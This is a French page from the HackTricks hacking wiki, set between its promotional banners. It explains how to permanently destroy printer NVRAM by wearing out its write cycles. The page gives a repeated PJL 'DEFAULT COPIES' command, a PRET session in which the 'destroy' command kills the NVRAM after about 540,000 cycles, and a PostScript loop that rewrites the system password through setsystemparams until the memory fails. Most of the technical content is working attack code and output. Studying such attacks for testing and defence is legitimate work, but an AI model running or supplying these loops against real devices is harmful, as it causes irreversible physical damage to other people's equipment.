4.6 KiB
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.
Les paramètres à long terme pour les imprimantes et autres dispositifs embarqués sont stockés dans une mémoire non volatile (NVRAM), qui est traditionnellement mise en œuvre soit comme EEPROM ou comme mémoire flash. Ces composants ont une durée de vie limitée. Aujourd'hui, les fournisseurs de mémoire flash garantissent environ 100 000 réécritures avant que des erreurs d'écriture puissent survenir.
PJL
Pour un test pratique visant à détruire la fonctionnalité d'écriture NVRAM, on peut continuellement définir la valeur à long terme pour le nombre de copies avec différentes valeurs pour X
:
@PJL DEFAULT COPIES=X
Habituellement, avant d'arrêter d'autoriser l'écriture, les paramètres NVRAM sont fixés à la valeur par défaut de l'usine et toutes les variables pourraient encore être modifiées pour le travail d'impression actuel en utilisant la commande @PJL SET...
.
En utilisant PRET :
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
[... wait for about 24 hours ...]
I'm afraid. I'm afraid, Dave. Dave, my mind is going...
NVRAM died after 543894 cycles, 18:46:11
PostScript
Pour PostScript, il faut trouver une entrée dans le dictionnaire currentsystemparams qui survit à un redémarrage (et doit donc être stockée dans une sorte de NVRAM). Un bon candidat serait un mot de passe PostScript.
PostScript peut exécuter un script qui corrompt sa propre NVRAM :
/counter 0 def
{ << /Password counter 16 string cvs
/SystemParamsPassword counter 1 add 16 string cvs
>> setsystemparams /counter counter 1 add def
} loop
Plus d'informations sur ces techniques sont disponibles sur http://hacking-printers.net/wiki/index.php/Physical_damage
Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!
Autres moyens de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le merchandising officiel PEASS & HackTricks
- Découvrez La Famille PEASS, notre collection d'NFTs exclusifs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-moi sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de hacking en soumettant des PR aux dépôts github HackTricks et HackTricks Cloud.